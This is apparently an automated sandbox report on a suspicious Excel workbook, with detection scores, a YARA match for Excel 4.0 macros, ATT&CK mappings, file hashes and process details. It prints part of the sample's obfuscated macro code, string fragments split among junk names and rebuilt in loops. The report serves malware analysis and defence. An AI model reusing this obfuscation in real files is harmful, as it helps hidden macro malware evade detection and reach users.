Analysis Report o515508.xlsm
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
System Summary: |
---|
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Window title found: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection: |
---|
Hides that the sample has been downloaded from the Internet (zone.identifier) | Show sources |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting11 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Hidden Files and Directories1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 384332 |
Start date: | 08.04.2021 |
Start time: | 22:32:49 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | o515508.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 3 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal48.evad.winXLSM@1/6@0/0 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 24473 |
Entropy (8bit): | 7.632163314675518 |
Encrypted: | false |
SSDEEP: | 384:aezUYbGPTpYDBF/FFzlCI4RLRov7D5hvwNN4Q/dXNefGms/fdkVTRV+ypeP:aeXGPTpC/FFzlcVSv35WN6Q/7P//fYTs |
MD5: | 1DDA2C2F9A759A5DCA312B5368080B35 |
SHA1: | 24896787AE02B8870FB9B0F494A5257232AD84AC |
SHA-256: | 2F31438F6E7DD8A88378B77212DB8FCF9C2CD378708B8A8AC487FAC6920A8BC3 |
SHA-512: | 50BF7D7EC60CC3284DE5A1FB35EF8D4A209108F7F218D5648D74F6BAE5FFD77FFB4D716EE877E8C4993E91665EE3096AEFF459F0A074A0DA098F7F7B42608E3C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.462861254090878 |
Encrypted: | false |
SSDEEP: | 12:85QscLgXg/XAlCPCHaXtB8XzB/+PbX+WnicvbwbDtZ3YilMMEpxRljKlcTdJP9TK:854/XTd6joYegDv3qfrNru/ |
MD5: | 10AA3AF5285AF245181C614859CB7142 |
SHA1: | 1E7D9CB0B709EC9FCDD9F33DF15CF90F9DC620CF |
SHA-256: | B0DC304406BE28D6F246129D64CCD5E3C0B3C85100BB7237FAA22E428A876F8B |
SHA-512: | E26355437490C1FB14A70F762896B3A6A784D94105CC9CFD2306E6171554A6AE83FCB09EBF09FA70882F029540FDE44A2686D12CBDB1EA7823A3823407911FF8 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 4.254966697884004 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWBm4pulSQUFpulmxWBm4pulv:djyZu8ufZu1 |
MD5: | FB510C9B203982D49AD2B0714CDEC89A |
SHA1: | B669C1E37D40B708CC3A99C70F99B4955CDB8C3F |
SHA-256: | 1EA30CE694370452701D4E3B8728022A27075AA4277F1ED8624E9FE1A96CBA79 |
SHA-512: | 7E95C3FF4A7B0C7805E985A885AA8F51B2C6E44D6BB0D5C6BE3584590C382B2DC80196AA49B5457989B58C669C349EA74A9EE49D7F96D19D830477CED967D607 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 2008 |
Entropy (8bit): | 4.487571205516045 |
Encrypted: | false |
SSDEEP: | 24:8NEbU/XTd6jFykYV7kAe6qRDv3qfdM7dD2NEbU/XTd6jFykYV7kAe6qRDv3qfdMj:8Nf/XT0jFWtjtfQh2Nf/XT0jFWtjtfQ/ |
MD5: | A2A4A5DD80BD224DC56D6BB1FD4C0B17 |
SHA1: | 859A310AE08BB8041311B27C7C05698F8997346F |
SHA-256: | ACFDDD99CF0CD1E23480C7157CAF51BA062CCFD9FD1A4ED0111B9C2D4E82183A |
SHA-512: | DEA8592D689FAB169824BA4492106A65F7BFB6004DA5128C77062E68368EF8A4A47D9C32CE109733137D8910271AF1841D030F7F4900B38189D3C27412310B53 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 24476 |
Entropy (8bit): | 7.632100144810098 |
Encrypted: | false |
SSDEEP: | 384:aezUYbGPTpYDBF/FFzlCI4RLRov7D5hvwNN4Q/dXNefGms/fdkVTRV+ype7:aeXGPTpC/FFzlcVSv35WN6Q/7P//fYTK |
MD5: | CD81C714877C8967E68D718A2A761EFD |
SHA1: | 72E7B730DFA1A14E5D4612FFCDAFFBABAFEBDF4C |
SHA-256: | AFC6F7B974CD130E65579525D1C8697FE09748012917366B2BF265AC880FB1FC |
SHA-512: | CD9D993D544B11EFBBCEA5EE955AAB696C066FE27A5803FE827C13F5C69A175798EF4435E7617F675FD2C9F254F17CBD231894F1E5820E65203D17A00410A745 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.640847545115753 |
TrID: |
|
File name: | o515508.xlsm |
File size: | 24313 |
MD5: | ccb137d9d5260eaa14873354292dd85c |
SHA1: | f15f61a2af9d73c8ea16e88e88f91c3012656be7 |
SHA256: | 8adb6f54e65e375e16f3cda377df2d2a89f6aac15385fab45354240e7f1a13bc |
SHA512: | cdd975bb5f9b9aaaf9a91a32a5f36cfdbac145c2db2d2cc9bf9b9b1f4bcd80dcf23c2872ad49be9a4df91e0bb499c4ea74a3a1eaaff2f33272d4be6c0cb61313 |
SSDEEP: | 384:6qKzqwNQG8QDZ3gMEHW0rgU/FAi06EYfqL/fUlM9zNpOC:10QG3DZ3LaWOgN62/fxxpOC |
File Content Preview: | PK..........!...B.....M.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "o515508.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,fzBooSBqIP=A49,,-66,"=""=CAL""","=""=O""","=""=HA""","=""live""","=""lev""","=""au""","=""=W""","=""ama""","=""lev""","=""suit""","=""=WHI""","=""ama""","=""=IND""","=""=IF(""","=""am""","=""=E""","=""ele""","=""de""","=""li""","=""su""","=""=END""","=""=NE""","=""=FOR""","=""=NE""","=""=RE""","=""org""","=""in""","=""tr""","=""nort""","=""fi""","=""cou""","=""=org""",,-651,"=""CJNYf""","=""Z5rcS""","=""TOkB8E""","=""e5EpgVe""","=""MrMKGuqkKc""","=""Zi7Ocfi""","=""OLZX54ai""","=""Fe4StaE""","=""U8wvcCMai""","=""W7iIcA0p""","=""eV3lV7""","=""PQmf8n""","=""Yd7CCP""","=""BJHDBf9Hs""","=""RbW8BrSc9""","=""htuXWsV""","=""BSm1h6nR6y""","=""h0uZhNsz""","=""dUarY0""","=""yBx0wM""","=""iJ1jxWs""","=""H9gTW""","=""WHPBau""","=""XZgObOVD""","=""F9sy8H3h""","=""Uem6tIJ""","=""KZjIUzWa""","=""XhwHa""","=""cvt3gS5""","=""GVSasZUms4""","=""gREtR4""","=""bonrBkZ0d"""=WHILE(AND(fzBooSBqIP<32)),,728,"=""L(""""X""","=""N.""","=""LT(""","=""st""","=""it""","=""stri""","=""HI""","=""nd""","=""it""","=""ab""","=""LE""","=""nd""","=""IR""","=""R89C""","=""anda""","=""LSE(""","=""ctri""","=""si""","=""vest""","=""ita""","="".I""","=""XT()""","=""MUL""","=""XT""","=""TU""","=""ani""","=""tran""","=""eat=""","=""he""","=""re""","=""nte""","=""an"""NcqZSUljpjC=-2,,-855,"=""yTYy419""","=""cxkIBe""","=""GDFQv""","=""hio5z""","=""oZTJ1""","=""KvY41aE7V""","=""EHUnr3jI""","=""c7V9bMc""","=""XugndE""","=""TY9W2WG""","=""V11jEuoo""","=""TzieLlRIPB""","=""ISNUxJLqQ""","=""T8ieu2gsB""","=""gFuqGr""","=""lHWgunlCDD""","=""C7yXzVo9DQ""","=""UsCbBUqPY""","=""y7L2W5OY""","=""jecLEqd""","=""dybzMr""","=""tsMf74""","=""ndk1vWD""","=""qDKQ9oVQ""","=""iXxYsQ9""","=""X944FW3""","=""yq8xBRQ""","=""q2FwM""","=""PLvXwTm""","=""XbR980""","=""IxgAkMELq""","=""mi76He""",,64,"=""lcal""","=""TIME""","="")""","=""ock""","=""ra=0""","=""a=""","=""LE(""","=""a=""","=""ra""","=""le=""","=""(am""","=""a=a""","=""ECT""","=""1>""","=""=500""","="")""","=""ci""","=""gns=""","=""ock=""","=""ble""","=""F()""","=""qsbwbsKxgVuZy""","=""A(""","=""()""","=""RN""","=""za""","=""et=5""","=""1""","=""rn=R""","=""wal""","=""r=R""","=""iza"""fzBooSBqIP=fzBooSBqIP+1,,-63,"=""vvuH9YqrPg""","=""YMJqjLKi""","=""S1RMBAz""","=""J4RegXqT7""","=""u3P0WEn""","=""xjFA1H""","=""sMbPgZF8""","=""RjBRW""","=""JFm4xK""","=""iiKbNfx6""","=""HgIlvL""","=""c4lNPXaarj""","=""yPokB""","=""n0Oh5""","=""Bhjar""","=""hxSL9Jx""","=""Z9liu""","=""kH091""","=""Qx2awGLgn""","=""vXBbg""","=""kP8sdJOQp2""",,"=""CNzpU""","=""j3XAof""","=""P1hvRrI""","=""RbPRJH""","=""tvMHpzzWtj""","=""VOrskgqTY""","=""rTRCv7b""","=""SJxo77P""","=""wutXm8kK""","=""aqkBfhw""",,691,"=""l3""","=""(N""","=""qsbwbsKxgVuZy""","=""=0""","=""qsbwbsKxgVuZy""","=""RO""","=""lev""","=""-1""","=""=le""","=""""""""""""","=""and""","=""man""","=""(A""","=""100""","=""qsbwbsKxgVuZy""","=""qsbwbsKxgVuZy""","=""ty=M""","=""INDE""","=""live""","=""=sui""","=""qsbwbsKxgVuZy""",,"=""sui""","=""qsbwbsKxgVuZy""","=""()""","=""tio""","=""0""","=""qsbwbsKxgVuZy""","=""50""","=""l=""","=""109""","=""tion""""zoyyxSVtpqE=""""",,444,"=""NK7mIwA""","=""QeVI4""",,"=""nrQj0n""",,"=""peY239""","=""krNAkSzO""","=""hvqtv""","=""qFD9e""","=""DELBvlW6""","=""WqKB1FT4""","=""iVXrm""","=""dZ8cZqYP""","=""uBhE85BK""",,,"=""VFvxUKocRL""","=""SVJv3N8t""","=""KaMTdZd""","=""pbo3d8TatL""",,,"=""w6Jm2mNB""",,"=""KYrt62M3P""","=""xnbEG""","=""oKHTxuDKD""",,"=""PrlFx6gJ""","=""q9ya4KW2""","=""k3oFNFu6""","=""LRktfNOR"""=WHILE(NcqZSUljpjC<267),,778,"=""2"""",""","=""OW()""",,"=""qsbwbsKxgVuZy""",,"=""WS(n""","=""itr""","=""qsbwbsKxgVuZy""","=""vitr""","=""qsbwbsKxgVuZy""","=""a<50""","=""da+1""","=""DD""","=""0)""",,,"=""OD(l""","=""X(n""","=""st""","=""tabl""",,,"=""tab""",,"=""qsbwbsKxgVuZy""","=""nal""","=""qsbwbsKxgVuZy""",,"=""C3""","=""17""","=""C1""","=""al()""""=SUM(375,127)",,-890,"=""l7SmJSZ""","=""gSQRs""",,,,"=""vrzcvkM6QW""","=""vODpCWHoj""",,"=""A6LP3""",,"=""f8OEka3""","=""hRUeNVPyL""","=""p1hn6""","=""lyX06XsBks""",,,"=""MbPTd""","=""OWupZtL3i""","=""JEuFPs""","=""ACYtBf4P4x""",,,"=""HDtRF""",,,"=""ZiOdqY""",,,"=""bOUeo2R""","=""GweZ
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 22:33:38 |
Start date: | 08/04/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f200000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|